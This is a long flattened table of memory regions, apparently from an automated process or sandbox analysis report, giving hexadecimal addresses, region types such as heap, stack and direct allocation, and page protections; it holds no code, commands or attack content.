|
page read and write
|
||
D843000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
9623000
|
unkown
|
page readonly
|
||
966A000
|
unkown
|
page readonly
|
||
26FD000
|
stack
|
page read and write
|
||
80C0000
|
unkown
|
page execute read
|
||
963F000
|
unkown
|
page readonly
|
||
23979A34000
|
heap
|
page read and write
|
||
28C48D13000
|
heap
|
page read and write
|
||
1C44D40D000
|
heap
|
page read and write
|
||
B1C000
|
unkown
|
page read and write
|
||
1C44D3E4000
|
heap
|
page read and write
|
||
2870000
|
heap
|
page read and write
|
||
2C60000
|
heap
|
page read and write
|
||
23979A1B000
|
heap
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
28C4A827000
|
heap
|
page read and write
|
||
23979A35000
|
heap
|
page read and write
|
||
28C49B6F000
|
heap
|
page read and write
|
||
28C48392000
|
heap
|
page read and write
|
||
23979990000
|
heap
|
page read and write
|
||
28C482CC000
|
heap
|
page read and write
|
||
A62E000
|
direct allocation
|
page read and write
|
||
501F0FF000
|
stack
|
page read and write
|
||
26FD000
|
stack
|
page read and write
|
||
1C44D3C9000
|
heap
|
page read and write
|
||
915D000
|
unkown
|
page write copy
|
||
9570000
|
unkown
|
page readonly
|
||
286B000
|
heap
|
page read and write
|
||
23979A0D000
|
heap
|
page read and write
|
||
2A1F000
|
unkown
|
page read and write
|
||
F1B000
|
heap
|
page read and write
|
||
28C48D0E000
|
heap
|
page read and write
|
||
D65E000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C482CC000
|
heap
|
page read and write
|
||
28C493F4000
|
heap
|
page read and write
|
||
F02000
|
heap
|
page read and write
|
||
28C489A2000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
12327000
|
heap
|
page read and write
|
||
289A000
|
heap
|
page read and write
|
||
79FF000
|
unkown
|
page execute read
|
||
28C4823F000
|
heap
|
page read and write
|
||
2D4D000
|
stack
|
page read and write
|
||
346E000
|
stack
|
page read and write
|
||
B4EC000
|
direct allocation
|
page read and write
|
||
B2DD000
|
stack
|
page read and write
|
||
28C4A658000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
95A6000
|
unkown
|
page readonly
|
||
3230000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
9536000
|
unkown
|
page readonly
|
||
D7FC000
|
heap
|
page read and write
|
||
28C4304E000
|
heap
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
91A7000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C492AA000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
220D5804000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
AB3000
|
unkown
|
page read and write
|
||
29AA000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A6DC000
|
heap
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
28C48CFE000
|
heap
|
page read and write
|
||
FFDD0000
|
direct allocation
|
page read and write
|
||
28C42411000
|
heap
|
page read and write
|
||
E30000
|
heap
|
page read and write
|
||
28C498DA000
|
heap
|
page read and write
|
||
9171000
|
unkown
|
page write copy
|
||
2B4F000
|
direct allocation
|
page read and write
|
||
28C48FD4000
|
heap
|
page read and write
|
||
9197000
|
unkown
|
page write copy
|
||
28C48AED000
|
heap
|
page read and write
|
||
D895000
|
heap
|
page read and write
|
||
220D37C6000
|
heap
|
page read and write
|
||
3396000
|
heap
|
page read and write
|
||
28C49646000
|
heap
|
page read and write
|
||
2776000
|
heap
|
page read and write
|
||
5EAC000
|
unkown
|
page execute read
|
||
48A000
|
unkown
|
page execute read
|
||
28C4828A000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
29A7000
|
heap
|
page read and write
|
||
2B1C000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49016000
|
heap
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
28C4830E000
|
heap
|
page read and write
|
||
F25000
|
heap
|
page read and write
|
||
28C476F3000
|
heap
|
page read and write
|
||
AB3000
|
unkown
|
page write copy
|
||
2C7B000
|
heap
|
page read and write
|
||
A6EC000
|
stack
|
page read and write
|
||
F21000
|
heap
|
page read and write
|
||
28C4A0EE000
|
heap
|
page read and write
|
||
23979A2E000
|
heap
|
page read and write
|
||
2B36000
|
heap
|
page read and write
|
||
28C48CF8000
|
heap
|
page read and write
|
||
9563000
|
unkown
|
page readonly
|
||
1AD000
|
stack
|
page read and write
|
||
220D37BA000
|
heap
|
page read and write
|
||
D886000
|
heap
|
page read and write
|
||
28C42F4F000
|
heap
|
page read and write
|
||
23979A16000
|
heap
|
page read and write
|
||
28C48D13000
|
heap
|
page read and write
|
||
28C490DC000
|
heap
|
page read and write
|
||
2AE9000
|
direct allocation
|
page read and write
|
||
28C4A5D4000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
B645000
|
direct allocation
|
page read and write
|
||
A57D000
|
direct allocation
|
page read and write
|
||
A28B000
|
direct allocation
|
page read and write
|
||
3F76BFF000
|
stack
|
page read and write
|
||
28C48D0E000
|
heap
|
page read and write
|
||
28C423C9000
|
heap
|
page read and write
|
||
3290000
|
heap
|
page read and write
|
||
9681000
|
unkown
|
page readonly
|
||
DC4000
|
heap
|
page read and write
|
||
28C48CFE000
|
heap
|
page read and write
|
||
33AA000
|
heap
|
page read and write
|
||
28FA000
|
heap
|
page read and write
|
||
960B000
|
unkown
|
page readonly
|
||
2B06000
|
direct allocation
|
page read and write
|
||
2A5F000
|
stack
|
page read and write
|
||
74AF000
|
unkown
|
page execute read
|
||
28C4849A000
|
heap
|
page read and write
|
||
28C48CE6000
|
heap
|
page read and write
|
||
743D000
|
unkown
|
page execute read
|
||
2F40000
|
heap
|
page read and write
|
||
35AE000
|
unkown
|
page read and write
|
||
29ED000
|
stack
|
page read and write
|
||
29A7000
|
heap
|
page read and write
|
||
677C000
|
unkown
|
page execute read
|
||
2C61000
|
heap
|
page read and write
|
||
D7C5000
|
heap
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2730000
|
heap
|
page read and write
|
||
ACB000
|
unkown
|
page write copy
|
||
2A60000
|
heap
|
page read and write
|
||
B39C000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
3250000
|
heap
|
page read and write
|
||
28C499A0000
|
heap
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
220D37DD000
|
heap
|
page read and write
|
||
28C4A50F000
|
heap
|
page read and write
|
||
AF0A000
|
stack
|
page read and write
|
||
923B000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
B621000
|
direct allocation
|
page read and write
|
||
7F11000
|
unkown
|
page execute read
|
||
23979A00000
|
heap
|
page read and write
|
||
23979A15000
|
heap
|
page read and write
|
||
28C49436000
|
heap
|
page read and write
|
||
28C4246E000
|
heap
|
page read and write
|
||
CC96000
|
trusted library allocation
|
page read and write
|
||
238D000
|
stack
|
page read and write
|
||
2F7D000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2D50000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A69A000
|
heap
|
page read and write
|
||
28C423FA000
|
heap
|
page read and write
|
||
220D37FC000
|
heap
|
page read and write
|
||
28C49479000
|
heap
|
page read and write
|
||
B476000
|
direct allocation
|
page read and write
|
||
28C487D4000
|
heap
|
page read and write
|
||
28C48606000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
33A7000
|
heap
|
page read and write
|
||
28C48858000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A448000
|
heap
|
page read and write
|
||
2E4F000
|
unkown
|
page read and write
|
||
28C48ECC000
|
heap
|
page read and write
|
||
314F000
|
unkown
|
page read and write
|
||
2880000
|
heap
|
page read and write
|
||
28C49605000
|
heap
|
page read and write
|
||
2B1B000
|
heap
|
page read and write
|
||
323C000
|
heap
|
page read and write
|
||
28C494BA000
|
heap
|
page read and write
|
||
D50000
|
heap
|
page read and write
|
||
501ECFA000
|
stack
|
page read and write
|
||
28C4A50E000
|
heap
|
page read and write
|
||
A63E000
|
direct allocation
|
page read and write
|
||
28C483D4000
|
heap
|
page read and write
|
||
28C49E9C000
|
heap
|
page read and write
|
||
94F0000
|
unkown
|
page readonly
|
||
ADF000
|
unkown
|
page write copy
|
||
54AB000
|
unkown
|
page execute and read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2D9E000
|
unkown
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
35BF000
|
unkown
|
page read and write
|
||
28C48D15000
|
heap
|
page read and write
|
||
2AC4000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2700000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
3670000
|
heap
|
page read and write
|
||
28C4849A000
|
heap
|
page read and write
|
||
76DE000
|
unkown
|
page execute read
|
||
656C000
|
unkown
|
page execute read
|
||
9647000
|
unkown
|
page readonly
|
||
28C4A550000
|
heap
|
page read and write
|
||
AFD000
|
unkown
|
page read and write
|
||
28C49EDF000
|
heap
|
page read and write
|
||
276A000
|
heap
|
page read and write
|
||
E99000
|
heap
|
page read and write
|
||
B28000
|
unkown
|
page write copy
|
||
33FF000
|
stack
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
28C4A028000
|
heap
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
220D37B9000
|
heap
|
page read and write
|
||
28C42405000
|
heap
|
page read and write
|
||
B05F000
|
stack
|
page read and write
|
||
28C4995E000
|
heap
|
page read and write
|
||
28C43250000
|
heap
|
page read and write
|
||
276A000
|
heap
|
page read and write
|
||
23A0000
|
heap
|
page read and write
|
||
28C4A1F6000
|
heap
|
page read and write
|
||
28C48CD7000
|
heap
|
page read and write
|
||
2397B800000
|
heap
|
page read and write
|
||
280E000
|
stack
|
page read and write
|
||
28C48F51000
|
heap
|
page read and write
|
||
2996000
|
heap
|
page read and write
|
||
336A000
|
heap
|
page read and write
|
||
95D9000
|
unkown
|
page readonly
|
||
23979D95000
|
heap
|
page read and write
|
||
2AE2000
|
direct allocation
|
page read and write
|
||
3F76FFF000
|
stack
|
page read and write
|
||
28C48206000
|
heap
|
page read and write
|
||
28E0000
|
heap
|
page read and write
|
||
2BFE000
|
unkown
|
page read and write
|
||
294E000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
3630000
|
heap
|
page read and write
|
||
AF10000
|
trusted library allocation
|
page read and write
|
||
9651000
|
unkown
|
page readonly
|
||
2AFF000
|
direct allocation
|
page read and write
|
||
7B4E000
|
unkown
|
page execute read
|
||
28C4974E000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
759C000
|
unkown
|
page execute read
|
||
91B5000
|
unkown
|
page read and write
|
||
273D000
|
stack
|
page read and write
|
||
2B6F000
|
unkown
|
page read and write
|
||
9246000
|
unkown
|
page read and write
|
||
EE4000
|
heap
|
page read and write
|
||
28C48750000
|
heap
|
page read and write
|
||
D7BF000
|
stack
|
page read and write
|
||
EA8000
|
heap
|
page read and write
|
||
968A000
|
unkown
|
page readonly
|
||
2776000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
2A60000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
2CFC000
|
stack
|
page read and write
|
||
A1BD000
|
direct allocation
|
page read and write
|
||
D7CB000
|
heap
|
page read and write
|
||
2B2B000
|
direct allocation
|
page read and write
|
||
220D37E1000
|
heap
|
page read and write
|
||
2778000
|
heap
|
page read and write
|
||
28C48182000
|
heap
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
1C44D40D000
|
heap
|
page read and write
|
||
28C4A97C000
|
heap
|
page read and write
|
||
31AF000
|
unkown
|
page read and write
|
||
7FB5000
|
unkown
|
page execute read
|
||
1C44D3A8000
|
heap
|
page read and write
|
||
28C4A9D7000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A340000
|
heap
|
page read and write
|
||
FFD60000
|
direct allocation
|
page read and write
|
||
28C493B2000
|
heap
|
page read and write
|
||
D86E000
|
heap
|
page read and write
|
||
9594000
|
unkown
|
page readonly
|
||
12320000
|
heap
|
page read and write
|
||
D6BD000
|
stack
|
page read and write
|
||
2B56000
|
direct allocation
|
page read and write
|
||
28C4A9B3000
|
heap
|
page read and write
|
||
962A000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A8EC000
|
heap
|
page read and write
|
||
95B3000
|
unkown
|
page readonly
|
||
28C4A2BC000
|
heap
|
page read and write
|
||
28C4240D000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
925B000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A172000
|
heap
|
page read and write
|
||
28C4A592000
|
heap
|
page read and write
|
||
2A6D000
|
direct allocation
|
page read and write
|
||
3350000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48D15000
|
heap
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
28C489A2000
|
heap
|
page read and write
|
||
122FC000
|
heap
|
page read and write
|
||
28C4A2BC000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
1C44D3F4000
|
heap
|
page read and write
|
||
23979A07000
|
heap
|
page read and write
|
||
9288000
|
unkown
|
page write copy
|
||
28C48D07000
|
heap
|
page read and write
|
||
2AD9000
|
direct allocation
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
30FD000
|
stack
|
page read and write
|
||
9601000
|
unkown
|
page readonly
|
||
28C48CBA000
|
heap
|
page read and write
|
||
28C4A8EC000
|
heap
|
page read and write
|
||
A1DC000
|
direct allocation
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
29AA000
|
heap
|
page read and write
|
||
9504000
|
unkown
|
page readonly
|
||
954D000
|
unkown
|
page readonly
|
||
28C48E8A000
|
heap
|
page read and write
|
||
95CA000
|
unkown
|
page readonly
|
||
1C44D4B0000
|
remote allocation
|
page read and write
|
||
B09E000
|
stack
|
page read and write
|
||
2B48000
|
direct allocation
|
page read and write
|
||
2A86000
|
direct allocation
|
page read and write
|
||
D801000
|
heap
|
page read and write
|
||
B5D2000
|
direct allocation
|
page read and write
|
||
AF10000
|
remote allocation
|
page read and write
|
||
28C48CDC000
|
heap
|
page read and write
|
||
270B000
|
heap
|
page read and write
|
||
28C480CC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C49AA8000
|
heap
|
page read and write
|
||
3367000
|
heap
|
page read and write
|
||
B1DE000
|
stack
|
page read and write
|
||
28C48F0E000
|
heap
|
page read and write
|
||
28C49AEA000
|
heap
|
page read and write
|
||
28C42408000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
A1EA000
|
direct allocation
|
page read and write
|
||
2FE9000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
CCC0000
|
trusted library allocation
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
94F8000
|
unkown
|
page readonly
|
||
220D3A95000
|
heap
|
page read and write
|
||
220D383C000
|
heap
|
page read and write
|
||
220D37E2000
|
heap
|
page read and write
|
||
28C4A71E000
|
heap
|
page read and write
|
||
28C4A868000
|
heap
|
page read and write
|
||
954A000
|
unkown
|
page readonly
|
||
28C49268000
|
heap
|
page read and write
|
||
28C4246E000
|
heap
|
page read and write
|
||
28C4A3C4000
|
heap
|
page read and write
|
||
28C4242D000
|
heap
|
page read and write
|
||
9621000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
28C486CC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4A130000
|
heap
|
page read and write
|
||
1C44D3CA000
|
heap
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
D861000
|
heap
|
page read and write
|
||
E67000
|
heap
|
page read and write
|
||
D65C000
|
direct allocation
|
page read and write
|
||
3630000
|
heap
|
page read and write
|
||
28C4A97C000
|
heap
|
page read and write
|
||
28C48CF4000
|
heap
|
page read and write
|
||
28C4830E000
|
heap
|
page read and write
|
||
D81E000
|
heap
|
page read and write
|
||
2C53000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
29AA000
|
heap
|
page read and write
|
||
28C48607000
|
heap
|
page read and write
|
||
95CE000
|
unkown
|
page readonly
|
||
239799FC000
|
heap
|
page read and write
|
||
2C6F000
|
stack
|
page read and write
|
||
9164000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
28C49F20000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2A60000
|
direct allocation
|
page read and write
|
||
B5D9000
|
direct allocation
|
page read and write
|
||
28C48D10000
|
heap
|
page read and write
|
||
28C48CF9000
|
heap
|
page read and write
|
||
28C48B70000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2FED000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C4909A000
|
heap
|
page read and write
|
||
9597000
|
unkown
|
page readonly
|
||
23979D90000
|
heap
|
page read and write
|
||
2897000
|
heap
|
page read and write
|
||
9526000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
220D3797000
|
heap
|
page read and write
|
||
9509000
|
unkown
|
page readonly
|
||
961D000
|
unkown
|
page readonly
|
||
2BB0000
|
heap
|
page read and write
|
||
2897000
|
heap
|
page read and write
|
||
28C48CF8000
|
heap
|
page read and write
|
||
319F000
|
stack
|
page read and write
|
||
28C495C2000
|
heap
|
page read and write
|
||
D7CE000
|
heap
|
page read and write
|
||
A60F000
|
direct allocation
|
page read and write
|
||
26FF000
|
unkown
|
page read and write
|
||
28C4A4CC000
|
heap
|
page read and write
|
||
95B6000
|
unkown
|
page readonly
|
||
301E000
|
stack
|
page read and write
|
||
28C49688000
|
heap
|
page read and write
|
||
28FA000
|
heap
|
page read and write
|
||
2C7B000
|
heap
|
page read and write
|
||
28C49B2C000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page read and write
|
||
2800000
|
heap
|
page read and write
|
||
28C4A617000
|
heap
|
page read and write
|
||
2B90000
|
heap
|
page read and write
|
||
28C499E2000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48CD5000
|
heap
|
page read and write
|
||
2779000
|
heap
|
page read and write
|
||
28C492AA000
|
heap
|
page read and write
|
||
EBA000
|
heap
|
page read and write
|
||
300B000
|
heap
|
page read and write
|
||
952B000
|
unkown
|
page readonly
|
||
6932000
|
unkown
|
page execute read
|
||
405000
|
unkown
|
page execute read
|
||
ABC000
|
unkown
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
2A06000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
7F5A000
|
unkown
|
page execute read
|
||
965C000
|
unkown
|
page readonly
|
||
28C4A9D3000
|
heap
|
page read and write
|
||
AF10000
|
remote allocation
|
page read and write
|
||
D65E000
|
direct allocation
|
page read and write
|
||
D5BD000
|
trusted library allocation
|
page read and write
|
||
28C48D07000
|
heap
|
page read and write
|
||
28C49604000
|
heap
|
page read and write
|
||
7908000
|
unkown
|
page execute read
|
||
2779000
|
heap
|
page read and write
|
||
A26D000
|
direct allocation
|
page read and write
|
||
28C4889A000
|
heap
|
page read and write
|
||
D5C4000
|
direct allocation
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
9501000
|
unkown
|
page readonly
|
||
1C44D3AB000
|
heap
|
page read and write
|
||
A185000
|
unkown
|
page readonly
|
||
220D37C0000
|
heap
|
page read and write
|
||
28E6000
|
heap
|
page read and write
|
||
28C4995E000
|
heap
|
page read and write
|
||
B3DE000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
275F000
|
heap
|
page read and write
|
||
95DE000
|
unkown
|
page readonly
|
||
28C48CD2000
|
heap
|
page read and write
|
||
2C4E000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48BF4000
|
heap
|
page read and write
|
||
B49C000
|
direct allocation
|
page read and write
|
||
28C423EB000
|
heap
|
page read and write
|
||
28C48B2E000
|
heap
|
page read and write
|
||
335E000
|
stack
|
page read and write
|
||
28C48392000
|
heap
|
page read and write
|
||
9632000
|
unkown
|
page readonly
|
||
2FE9000
|
heap
|
page read and write
|
||
28C48240000
|
heap
|
page read and write
|
||
A420000
|
direct allocation
|
page read and write
|
||
220D37E4000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C494FC000
|
heap
|
page read and write
|
||
28C4A6DC000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C497D2000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48CF4000
|
heap
|
page read and write
|
||
29E0000
|
heap
|
page read and write
|
||
28C48D0B000
|
heap
|
page read and write
|
||
2E00000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
B655000
|
direct allocation
|
page read and write
|
||
6817000
|
unkown
|
page execute read
|
||
D7D2000
|
heap
|
page read and write
|
||
28C494BA000
|
heap
|
page read and write
|
||
B29000
|
unkown
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
28C48CFE000
|
heap
|
page read and write
|
||
220D3840000
|
heap
|
page read and write
|
||
6B31000
|
unkown
|
page execute read
|
||
D65E000
|
direct allocation
|
page read and write
|
||
965A000
|
unkown
|
page readonly
|
||
9666000
|
unkown
|
page readonly
|
||
239799E8000
|
heap
|
page read and write
|
||
28C4A1B4000
|
heap
|
page read and write
|
||
7B07000
|
unkown
|
page execute read
|
||
28C4A71F000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
9545000
|
unkown
|
page readonly
|
||
28C49D11000
|
heap
|
page read and write
|
||
28C48C36000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
EFE000
|
heap
|
page read and write
|
||
28C423FD000
|
heap
|
page read and write
|
||
28C494BA000
|
heap
|
page read and write
|
||
28C4A130000
|
heap
|
page read and write
|
||
28C48648000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
33A6000
|
heap
|
page read and write
|
||
28C49D94000
|
heap
|
page read and write
|
||
B31000
|
unkown
|
page readonly
|
||
220D3790000
|
heap
|
page read and write
|
||
35FE000
|
stack
|
page read and write
|
||
28C49C76000
|
heap
|
page read and write
|
||
D804000
|
heap
|
page read and write
|
||
3F76CFF000
|
stack
|
page read and write
|
||
2B24000
|
direct allocation
|
page read and write
|
||
35E0000
|
heap
|
page read and write
|
||
28C48D0E000
|
heap
|
page read and write
|
||
9270000
|
unkown
|
page read and write
|
||
28C48D18000
|
heap
|
page read and write
|
||
2A50000
|
heap
|
page read and write
|
||
E3A000
|
heap
|
page read and write
|
||
A59C000
|
direct allocation
|
page read and write
|
||
E93000
|
heap
|
page read and write
|
||
28C4242C000
|
heap
|
page read and write
|
||
5493000
|
unkown
|
page execute read
|
||
913A000
|
unkown
|
page execute read
|
||
400000
|
unkown
|
page readonly
|
||
28C4A9E3000
|
heap
|
page read and write
|
||
1317C000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2A5B000
|
heap
|
page read and write
|
||
28C4A550000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
133BF000
|
stack
|
page read and write
|
||
220D38A0000
|
heap
|
page read and write
|
||
237D000
|
stack
|
page read and write
|
||
F0A000
|
heap
|
page read and write
|
||
916B000
|
unkown
|
page write copy
|
||
220D5800000
|
heap
|
page read and write
|
||
132BE000
|
stack
|
page read and write
|
||
28C0000
|
heap
|
page read and write
|
||
2AD2000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48AAA000
|
heap
|
page read and write
|
||
9606000
|
unkown
|
page readonly
|
||
922A000
|
unkown
|
page read and write
|
||
28C48CEC000
|
heap
|
page read and write
|
||
28C489E4000
|
heap
|
page read and write
|
||
28C49646000
|
heap
|
page read and write
|
||
3F76EFF000
|
stack
|
page read and write
|
||
5420000
|
direct allocation
|
page execute and read and write
|
||
AF10000
|
trusted library allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
501F3FE000
|
stack
|
page read and write
|
||
342F000
|
stack
|
page read and write
|
||
AF10000
|
trusted library allocation
|
page read and write
|
||
274E000
|
stack
|
page read and write
|
||
1C44D3DC000
|
heap
|
page read and write
|
||
6FCF9000
|
unkown
|
page read and write
|
||
28C49226000
|
heap
|
page read and write
|
||
28C49C77000
|
heap
|
page read and write
|
||
28C4A028000
|
heap
|
page read and write
|
||
501F4FE000
|
stack
|
page read and write
|
||
A417000
|
direct allocation
|
page read and write
|
||
220D3847000
|
heap
|
page read and write
|
||
29A7000
|
heap
|
page read and write
|
||
304F000
|
stack
|
page read and write
|
||
2FE6000
|
heap
|
page read and write
|
||
9286000
|
unkown
|
page read and write
|
||
28C48CFE000
|
heap
|
page read and write
|
||
28C4891E000
|
heap
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
28C48BB2000
|
heap
|
page read and write
|
||
501F1FF000
|
stack
|
page read and write
|
||
2EFD000
|
stack
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
95C3000
|
unkown
|
page readonly
|
||
2C61000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2A40000
|
direct allocation
|
page execute and read and write
|
||
B6D0000
|
direct allocation
|
page read and write
|
||
5470000
|
heap
|
page read and write
|
||
38A0000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
2AB5000
|
direct allocation
|
page read and write
|
||
915E000
|
unkown
|
page read and write
|
||
28C423F1000
|
heap
|
page read and write
|
||
9576000
|
unkown
|
page readonly
|
||
28C4A06B000
|
heap
|
page read and write
|
||
28C42D51000
|
heap
|
page read and write
|
||
34BE000
|
unkown
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48D08000
|
heap
|
page read and write
|
||
61E6000
|
unkown
|
page execute read
|
||
28C4246E000
|
heap
|
page read and write
|
||
28C48AEC000
|
heap
|
page read and write
|
||
95D7000
|
unkown
|
page readonly
|
||
F21000
|
heap
|
page read and write
|
||
A5B9000
|
direct allocation
|
page read and write
|
||
36EE000
|
stack
|
page read and write
|
||
2720000
|
heap
|
page read and write
|
||
28C48BB2000
|
heap
|
page read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
28C462F3000
|
heap
|
page read and write
|
||
23979D50000
|
heap
|
page read and write
|
||
23979A1E000
|
heap
|
page read and write
|
||
AB6000
|
unkown
|
page read and write
|
||
DC4000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
337B000
|
heap
|
page read and write
|
||
28C49AA8000
|
heap
|
page read and write
|
||
2E8E000
|
stack
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
23F0000
|
heap
|
page read and write
|
||
28C4828A000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
28C423EE000
|
heap
|
page read and write
|
||
32FC000
|
stack
|
page read and write
|
||
28C4A92F000
|
heap
|
page read and write
|
||
33A0000
|
heap
|
page read and write
|
||
28C49058000
|
heap
|
page read and write
|
||
233D000
|
stack
|
page read and write
|
||
220D37CD000
|
heap
|
page read and write
|
||
A221000
|
direct allocation
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
23EE000
|
unkown
|
page read and write
|
||
A617000
|
direct allocation
|
page read and write
|
||
912F000
|
unkown
|
page execute read
|
||
28C4A7A3000
|
heap
|
page read and write
|
||
B5C4000
|
direct allocation
|
page read and write
|
||
29EF000
|
stack
|
page read and write
|
||
32AF000
|
heap
|
page read and write
|
||
26FD000
|
stack
|
page read and write
|
||
D853000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C423A8000
|
heap
|
page read and write
|
||
9188000
|
unkown
|
page read and write
|
||
28C4A448000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page execute read
|
||
1C44D3CA000
|
heap
|
page read and write
|
||
1C44D3AD000
|
heap
|
page read and write
|
||
1C44D398000
|
heap
|
page read and write
|
||
28C48CFE000
|
heap
|
page read and write
|
||
28C48E48000
|
heap
|
page read and write
|
||
23979A31000
|
heap
|
page read and write
|
||
28C49A24000
|
heap
|
page read and write
|
||
32C6000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48F92000
|
heap
|
page read and write
|
||
28C48CE6000
|
heap
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
28C48D01000
|
heap
|
page read and write
|
||
28C4A173000
|
heap
|
page read and write
|
||
220D37FC000
|
heap
|
page read and write
|
||
73CC000
|
unkown
|
page execute read
|
||
28C4A8EC000
|
heap
|
page read and write
|
||
2B65000
|
direct allocation
|
page read and write
|
||
28C48D13000
|
heap
|
page read and write
|
||
2C61000
|
heap
|
page read and write
|
||
28C48F50000
|
heap
|
page read and write
|
||
D9E000
|
stack
|
page read and write
|
||
E67000
